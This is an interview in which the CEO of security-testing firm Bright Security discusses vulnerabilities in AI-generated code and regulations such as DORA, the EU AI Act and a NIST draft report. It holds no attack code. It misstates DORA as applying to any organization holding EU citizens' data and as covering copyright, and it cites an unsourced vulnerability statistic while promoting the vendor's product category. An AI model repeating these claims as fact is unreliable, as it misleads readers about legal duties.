
In an exclusive interview with Cyber Intelligence, Gadi Bashvitz, CEO of cybersecurity testing firm, Bright Security warns of the security challenges facing organizations in the wake of widespread adoption of GenAI.
Cyber Intelligence: Are there any specific dangers of which companies using GenAI to generate new code should be particularly aware?
Gadi Bashvitz: There are multiple considerations here. On one hand, any solution developed leveraging LLMs is prone to LLM-specific vulnerabilities such as Insecure Output Handling and Broken Access Control and it is critical to make sure organizations are aware and can detect such vulnerabilities before releasing LLM-based solutions. On the other hand, organizations leveraging GenAI code generation tools face a very different risk. The underlying problem is that AI-code generation technologies leverage a great deal of open-source code for training. This open-source content is full of security holes and very easy for bad actors to exploit resulting in the AI-generated code having these same issues. AI-generated code has four times more vulnerabilities than human-generated code. Organizations need to identify the cybersecurity gaps left by GenAI by using vulnerability-testing and remediation solutions.
Cyber Intelligence: How urgent a priority is this?
Gadi Bashvitz: Deploying GenAI-based SW without being aware, testing, and remediating the vulnerabilities it could introduce is like installing a very sophisticated alarm system and not arming it as you might be giving away the keys to the kingdom… If, for example, an organization is going to launch a new product, then it is essential to address potential and already-existing vulnerabilities at the pre-production stage. If, on the other hand, the product is in the post-production or launch phase, vulnerability assessment of AI-generated code is even more urgent. Companies also need to examine precisely what role GenAI may have in the development of their Application Programming Interface (API), and the rules and protocols that allow different software applications to communicate with each other. The consequences of not doing so could result in significant exposure to data breaches, or generate a raft of lawsuits and some very hefty future fines.
Cyber Intelligence: So what can organizations who may have adopted AI quickly do in order to comply with this fresh barrage of security directives relating to the adoption of GenAI?
Gadi Bashvitz: There are a number of steps organizations can take to improve their security posture. As organizations adopt GenAI tools or use GenAI to speed up coding, they need to build security into these processes and make sure they can identify those vulnerabilities before they are deployed to production and can be exploited by the rapidly growing number of bad actors worldwide. These may be financially motivated international gangs of cybercriminals or, increasingly, nation-state-backed bad actors intent on espionage and sabotage. Once the vulnerabilities are identified they need to be effectively remediated and the fix validated.
Cyber Intelligence: Exactly how and when is international regulation relating to GenAI going to impact organizations in, for instance, the US?
Gadi Bashvitz: As of January 16, organizations across the world that carry any data on any European Union (EU) citizens will be obliged to comply with the EU’s new Digital Operational Resilience Act (DORA). DORA aims to strengthen the IT security of entities like banks, insurance companies, and investment firms, and companies that do not plug security gaps created by GenAI could face severe penalties. For example, DORA imposes strict by-design principles that GenAI is not yet capable of adhering to. It will also encompass the issue of intellectual copyright on any product or service – GenAI is also notorious for disregarding this.
Cyber Intelligence: In addition to DORA in January, is there any other international regulation about impacting organizations that may have recently begun to adopt GenAI?
Gadi Bashvitz: The EU ban on AI systems that pose an unacceptable risk also comes into force In February. The act clearly sets out a list of prohibited AI practices that pose an “unacceptable risk” to EU citizens’ safety or that are intrusive or discriminatory. This could create potential pitfalls for organizations that have already integrated the use of GenAI. Very recently, on December 16, 2024, The US National Cybersecurity Center of Excellence (NCCoE) also released the Draft NIST Internal Report (IR), which calls for a structured, tight risk-based approach to managing cybersecurity.
Cyber Intelligence: Thank you.